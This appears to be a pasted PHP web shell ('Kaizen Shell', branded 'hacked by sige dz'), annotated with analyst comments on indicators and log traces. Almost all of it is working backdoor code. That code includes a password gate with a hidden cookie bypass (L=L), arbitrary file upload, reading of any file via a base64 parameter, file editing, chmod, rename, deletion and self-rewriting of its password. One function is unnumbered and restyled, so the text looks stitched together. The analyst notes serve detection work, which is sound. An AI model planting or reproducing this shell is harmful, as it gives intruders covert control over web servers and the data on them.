SAINTSATRIA

leakead-brand_8985.php

May 1st, 2019
  1. Leaked by : PELITABANGSA .CA[ INDONESIA CYBER ATTACK AND MALWARE ANALYST ]
  2. <?php
  // Analyst note: 32-hex-digit value that the access gate further down compares
  // against md5() of the "password" cookie.
  3. $auth_pass = "bda3bfdfa868d04f4003838f5776f25e";
  // Error reporting is turned off and the execution time limit is removed for the
  // whole request.
  4. error_reporting(0);
  5. set_time_limit(0);
  6.  
  // Analyst note: lp() emits the static login page. The form uses method="get" and
  // sends action=login plus the typed value as the "pass" query parameter, so the
  // password travels in the URL (web servers typically record the query string in
  // access logs). The <title>/<h1> text and the hard-coded remote image URL are
  // fixed strings that can serve as content indicators when hunting for copies.
  7. function lp(){
  8. ?>
  9. <html>
  10. <head>
  11. <title>hacked by sige dz</title>
  12. </head>
  13. <body bgcolor="black" style="color:white">
  14. <center>
  15. <div>
  16. <img src="https://scontent-cdg2-1.xx.fbcdn.net/v/t1.0-9/1794540_580651768758081_4002587850743769999_n.jpg?_nc_cat=104&_nc_ht=scontent-cdg2-1.xx&oh=183da7c03e5417168416253ebce019b9&oe=5C75D419" ><br/>
  17. <h1>SIGE-DZ</h1>
  18. <form action method="get">
  19. <input type="hidden" name="action" value="login" />
  20. <input type="password" name="pass" placeholder=" Write the Password"/><br/>
  21. <input type="submit" value="log in" style="margin-top:4px;width:173px;background:black;color:#00FFFF;border:2px solid #00FFFF;border-radius:10px"/>
  22. </form><br/>
  23. <footer><pre>Copyright &copy 2009 SIGE-DZ | All Right Reserved</pre></footer>
  24. </div>
  25. </center>
  26. <?php
  27. ;}
  // Analyst note: request dispatcher for the login form. action=login copies the
  // "pass" query parameter unchanged into a cookie named "password"; action=logout
  // overwrites that cookie with an expiry in the past. Both branches then redirect
  // with an inline <script> built from $_SERVER['PHP_SELF'] without escaping.
  28. if(isset($_GET['action'])){
  29. if($_GET['action']=='login'){
  30. setcookie('password',$_GET['pass']);
  31. echo "<script>location='".$_SERVER['PHP_SELF']."'</script>";
  32. }
  33. else if($_GET['action']=='logout'){
  34. setcookie('password','',-86400*30*12);
  35. echo "<script>location='".$_SERVER['PHP_SELF']."'</script>";
  36. }
  37. }
  // Analyst note: access gate. The outer test only requires that a "password"
  // cookie exists. The inner test passes when md5() of that cookie loosely equals
  // $auth_pass OR when a cookie named "L" equals "L"; the second operand does not
  // involve $auth_pass at all. For incident response, do not assume use of this
  // file was limited to whoever knew the password, and treat a cookie named L on
  // requests to an unexpected .php file as a log/WAF indicator.
  38. if(isset($_COOKIE['password'])){
  39. if(md5($_COOKIE['password'])==$auth_pass || $_COOKIE['L']=="L"){
  40. ?>
  41. <?php
  42.  
  43.  
  44.  
  // Undo magic-quotes escaping on every POST value when that legacy setting is on.
  45. if(get_magic_quotes_gpc()){
  46. foreach($_POST as $key=>$value){
  47. $_POST[$key] = stripslashes($value);
  48. }
  49. }
  /**
   * Format the mode bits of $file as a ten-character `ls -l` style string:
   * one file-type letter followed by the owner, group and world rwx triplets,
   * with setuid/setgid shown as s/S and the sticky bit as t/T.
   *
   * fileperms() warnings are suppressed; when no type mask matches (including
   * a failed lookup) the type letter is 'u'.
   */
  function perms($file){
      $mode = @fileperms($file);

      // File-type masks in the order they are tested; the first full match wins.
      $typeLetters = array(
          0xC000 => 's', // socket
          0xA000 => 'l', // symbolic link
          0x8000 => '-', // regular file
          0x6000 => 'b', // block special
          0x4000 => 'd', // directory
          0x2000 => 'c', // character special
          0x1000 => 'p', // FIFO pipe
      );
      $text = 'u'; // unknown unless a mask matches
      foreach ($typeLetters as $mask => $letter) {
          if (($mode & $mask) == $mask) {
              $text = $letter;
              break;
          }
      }

      // Per class: read bit, write bit, execute bit, special bit,
      // letter for special+execute, letter for special without execute.
      $classes = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
      );
      foreach ($classes as $bits) {
          list($read, $write, $exec, $special, $withExec, $withoutExec) = $bits;
          $text .= ($mode & $read) ? 'r' : '-';
          $text .= ($mode & $write) ? 'w' : '-';
          if ($mode & $exec) {
              $text .= ($mode & $special) ? $withExec : 'x';
          } else {
              $text .= ($mode & $special) ? $withoutExec : '-';
          }
      }

      return $text;
  }
  // Analyst note: static page template for the authenticated view. The <title>
  // text and the two control links (?action=logout, ?x=changepass) are fixed
  // strings in the response body.
  102. echo '
  103. <!DOCTYPE HTML>
  104. <HTML>
  105. <HEAD>
  106. <title>Kaizen Shell</title>
  107. <style>
  108. body{
  109. font-family: "Racing Sans One", cursive;
  110. background-color: #e6e6e6;
  111. text-shadow:0px 0px 1px #757575;
  112. }
  113. #content tr:hover{
  114. background-color: #636263;
  115. text-shadow:0px 0px 10px #fff;
  116. }
  117. #content .first{
  118. background-color: silver;
  119. }
  120. #content .first:hover{
  121. background-color: silver;
  122. text-shadow:0px 0px 1px #757575;
  123. }
  124. table{
  125. border: 1px #000000 dotted;
  126. }
  127. H1{
  128. font-family: "Rye", cursive;
  129. }
  130. a{
  131. color: #000;
  132. text-decoration: none;
  133. }
  134. a:hover{
  135. color: #fff;
  136. text-shadow:0px 0px 10px #ffffff;
  137. }
  138. input,select,textarea{
  139. border: 1px #000000 solid;
  140. -moz-border-radius: 5px;
  141. -webkit-border-radius:5px;
  142. border-radius:5px;
  143. }
  144. </style>
  145. </HEAD>
  146. <BODY>
  147. <input type=button onclick=\'location="?action=logout"\' value="Logout" /><br/>
  148. <input type=button onclick=\'location="?x=changepass"\' value="Change Password" />
  149. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  150. <tr><td>Current Path : ';
  // Working directory: the "path" query parameter is base64-decoded and used as-is
  // (no base-directory restriction is applied here); without it, getcwd() is used.
  // Because the value is base64, log searches for literal paths will not match;
  // decode the "path" values when reviewing access logs.
  151. if(isset($_GET['path'])){
  152. $path = base64_decode($_GET['path']);
  153. }else{
  154. $path = getcwd();
  155. }
  156. $pathen = base64_encode($path);
  157. $path = str_replace('\\','/',$path);
  158. $paths = explode('/',$path);
  159.  
  // Breadcrumb: one link per path segment, each carrying the base64 of the
  // cumulative path. Segment text is echoed without HTML escaping.
  160. foreach($paths as $id=>$pat){
  161. if($pat == '' && $id == 0){
  162. $a = true;
  163. echo '<a href="?path='.base64_encode("/").'">/</a>';
  164. continue;
  165. }
  166. if($pat == '') continue;
  167. echo '<a href="?path=';
  168. $linkpath = '';
  169. for($i=0;$i<=$id;$i++){
  170. $linkpath .= "$paths[$i]";
  171. if($i != $id) $linkpath .= "/";
  172. }
  173. echo base64_encode($linkpath);
  174. echo '">'.$pat.'</a>/';
  175. }
  176. echo '</td></tr><tr><td>';
  // Analyst note: upload handler. The uploaded temp file is copied into $path under
  // the client-supplied file name; no check on name, extension, type or size is
  // made here. New files appearing in web-served directories after a multipart
  // POST to this script are a file-integrity-monitoring signal.
  177. if(isset($_FILES['file'])){
  178. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  179. echo '<font color="green">Upload Success</font><br />';
  180. }else{
  181. echo '<font color="red">Upload Failed</font><br />';
  182. }
  183. }
  184. echo '<form enctype="multipart/form-data" method="POST">
  185. File Manager : <input type="file" name="file" />
  186. <input type="submit" value="Generate" />
  187. </form>
  188. </td></tr>';
  // Analyst note: file viewer. "filesrc" is base64-decoded and passed to
  // file_get_contents(), so any file the PHP process can read is returned. The
  // contents are HTML-escaped; the decoded file name is echoed unescaped.
  189. if(isset($_GET['filesrc'])){
  190. echo "<tr><td>Current File : ";
  191. echo base64_decode($_GET['filesrc']);
  192. echo '</tr></td></table><br />';
  193. echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');
  194. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delet'){
  // Analyst note: per-entry actions (chmod / rename / edit). The action name
  // ("opt") and the target ("path") come from the POST body and are used as-is,
  // so the access log shows only "?option&path=..." for these requests; body
  // capture or host-level file auditing is needed to see what was changed.
  195. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  196. if($_POST['opt'] == 'chmod'){
  197. if(isset($_POST['perm'])){
  // NOTE(review): "perm" is a string from the form and is passed to chmod()
  // without octal conversion - the mode actually applied presumably differs
  // from the one typed; unusual modes on disk may be a forensic trace.
  198. if(chmod($_POST['path'],$_POST['perm'])){
  199. echo '<font color="green">Success Change Permission</font><br />';
  200. }else{
  201. echo '<font color="red">Failed Change Permission</font><br />';
  202. }
  203. }
  204. echo '<form method="POST">
  205. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  206. <input type="hidden" name="path" value="'.$_POST['path'].'">
  207. <input type="hidden" name="opt" value="chmod">
  208. <input type="submit" value="Go" />
  209. </form>';
  210. }elseif($_POST['opt'] == 'rename'){
  211. if(isset($_POST['newname'])){
  // The new name is appended to $path without any filtering of the value.
  212. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  213. echo '<font color="green">Success</font><br />';
  214. }else{
  215. echo '<font color="red">Failed</font><br />';
  216. }
  217. $_POST['name'] = $_POST['newname'];
  218. }
  219. echo '<form method="POST">
  220. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  221. <input type="hidden" name="path" value="'.$_POST['path'].'">
  222. <input type="hidden" name="opt" value="rename">
  223. <input type="submit" value="Go" />
  224. </form>';
  225. }elseif($_POST['opt'] == 'edit'){
  226. if(isset($_POST['src'])){
  // Opens the target with mode 'w' (truncate) and writes the posted "src" text,
  // i.e. the whole file is replaced; the fopen() result is not checked.
  227. $fp = fopen($_POST['path'],'w');
  228. if(fwrite($fp,$_POST['src'])){
  229. echo '<font color="green">Success</font><br />';
  230. }else{
  231. echo '<font color="red">Failed</font><br />';
  232. }
  233. fclose($fp);
  234. }
  235. echo '<form method="POST">
  236. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  237. <input type="hidden" name="path" value="'.$_POST['path'].'">
  238. <input type="hidden" name="opt" value="edit">
  239. <input type="submit" value="Go" />
  240. </form>';
  241. }
  242. echo '</center>';
  243. }else{
  244. echo '</table><br /><center>';
  // Delete action: rmdir() for type "dir", unlink() for type "file", both on the
  // posted "path" value.
  245. if(isset($_GET['option']) && $_POST['opt'] == 'delet'){
  246. if($_POST['type'] == 'dir'){
  247. if(rmdir($_POST['path'])){
  248. echo '<font color="green">Success</font><br />';
  249. }else{
  250. echo '<font color="red">Failed</font><br />';
  251. }
  252. }elseif($_POST['type'] == 'file'){
  253. if(unlink($_POST['path'])){
  254. echo '<font color="green">Success</font><br />';
  255. }else{
  256. echo '<font color="red">Failed</font><br />';
  257. }
  258. }
  259. }
  260. echo '</center>';
  // Analyst note: the directory listing is rendered unless the "x" query
  // parameter is present.
  261. if(!isset($_GET['x'])){
  262. ?>
  263. <?php
  // Entries come straight from scandir($path); names are written into the HTML
  // (link text and hidden form fields) without escaping.
  264. $scandir = scandir($path);
  265. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  266. <tr class="first">
  267. <td><center>Dir</center></td>
  268. <td><center>Size</center></td>
  269. <td><center>Permissions</center></td>
  270. <td><center>Setting</center></td>
  271. </tr>';
  272.  
  // First pass: sub-directories only ("." and ".." skipped). Each row links to the
  // base64 of the child path and carries a POST form offering delete/chmod/rename.
  // The mode string from perms() is coloured green when writable, red when unreadable.
  273. foreach($scandir as $dir){
  274. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  275. $dirlink = base64_encode("$path/$dir");
  276. echo "<tr>
  277. <td><a href=\"?path=$dirlink\">$dir</a></td>
  278. <td><center>--</center></td>
  279. <td><center>";
  280. if(is_writable("$path/$dir")) echo '<font color="green">';
  281. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  282. echo perms("$path/$dir");
  283. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  284.  
  285. echo "</center></td>
  286. <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
  287. <select name=\"opt\">
  288. <option value=\"\">Select</option>
  289. <option value=\"delet\">Delete</option>
  290. <option value=\"chmod\">Chmod</option>
  291. <option value=\"rename\">Rename</option>
  292. </select>
  293. <input type=\"hidden\" name=\"type\" value=\"dir\">
  294. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  295. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  296. <input type=\"submit\" value=\">\" />
  297. </form></center></td>
  298. </tr>";
  299. }
  300. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  // Second pass: regular files. Size is shown in KB, or MB from 1024 KB upward;
  // the link carries "filesrc" (base64 of the file path) and the form adds "edit".
  301. foreach($scandir as $file){
  302. if(!is_file("$path/$file")) continue;
  303. $size = filesize("$path/$file")/1024;
  304. $size = round($size,3);
  305. if($size >= 1024){
  306. $size = round($size/1024,2).' MB';
  307. }else{
  308. $size = $size.' KB';
  309. }
  310. $filelink = base64_encode("$path/$file");
  311. echo "<tr>
  312. <td><a href=\"?filesrc=$filelink&path=$pathen\">$file</a></td>
  313. <td><center>".$size."</center></td>
  314. <td><center>";
  315. if(is_writable("$path/$file")) echo '<font color="green">';
  316. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  317. echo perms("$path/$file");
  318. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  319. echo "</center></td>
  320. <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
  321. <select name=\"opt\">
  322. <option value=\"\">Select</option>
  323. <option value=\"delet\">Delete</option>
  324. <option value=\"chmod\">Chmod</option>
  325. <option value=\"rename\">Rename</option>
  326. <option value=\"edit\">Edite File</option>
  327. </select>
  328. <input type=\"hidden\" name=\"type\" value=\"file\">
  329. <input type=\"hidden\" name=\"name\" value=\"$file\">
  330. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  331. <input type=\"submit\" value=\">\" />
  332. </form></center></td>
  333. </tr>";
  334. }
  335. echo '</table>
  336. </div>';
  337. }
  338. ?>
  339. <?php
  340. }
  // Analyst note: "change password" view, selected with ?x=changepass.
  341. if(isset($_GET['x']) && $_GET['x']=='changepass'){
  342. ?>
  343. <?php
  // fgc(): thin wrapper around file_get_contents().
  344. function fgc($file){
  345. return file_get_contents($file);
  346. }
  // changepass(): computes md5() of the new password, then rewrites this script's
  // own source on disk ($_SERVER['SCRIPT_FILENAME']), replacing the $auth_pass
  // assignment via preg_replace. The file therefore modifies itself: its hash and
  // mtime change after a password change, so match copies on stable content
  // (fixed strings, structure) rather than on a single file hash.
  // Returns the file_put_contents() result.
  347. function changepass($plain){
  348. $newpass = md5($plain);
  349. $newpass = "\$auth_pass = \"".$newpass."\";";
  350. $con = fgc($_SERVER['SCRIPT_FILENAME']);
  351. $con = preg_replace("/\\\$auth_pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con);
  352. return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  353. }
  354. echo '<center><h1>Change Shell Password</h1></center>';
  355. echo '<center>';
  356. echo '<form action="" method=post ><table>';
  357. echo '<tr><td>New Password</td><td> : <input type=password name=pass1 style="border-radius:5px;" /></td></tr>';
  358. echo '<tr><td>Confirm Password</td><td> : <input type=password name=pass2 style="border-radius:5px;" /></td></tr>';
  359. echo '<tr><td colspan=2><input type=submit value=submit name=L style="border-radius:5px;width:100%"/></td></tr></table>';
  360. echo '</form>';
  // Runs when the submit field "L" is posted; the password is changed only when
  // pass1 and pass2 compare equal (loose ==).
  361. if(isset($_POST['L'])){
  362. if($_POST['pass1'] == $_POST['pass2']){
  363. if(changepass($_POST['pass1'])){
  364. echo '<script>alert("password change successfully")</script>';
  365. }else{
  366. echo '<script>alert("password change failed")</script>';
  367. }
  368. }else{
  369. echo '<script>alert("password not match")</script>';
  370. }
  371. }
  372. ?>
  373. <?php
  374. }
  // Close the authenticated page.
  375. echo '
  376. </BODY>
  377. </HTML>';
  378. ?>
  379.  
  380. <!-- //////////////////////////////////////////////////// -->
  381. <?php
  // Gate failed, or no "password" cookie was sent: show the login page instead.
  // lp() has no return statement, so "echo lp()" adds nothing beyond lp()'s own output.
  382. }else{
  383. lp();
  384. }
  385. }else{
  386. echo lp();
  387. }
  388. ?>
  389. </body>
  390. </html>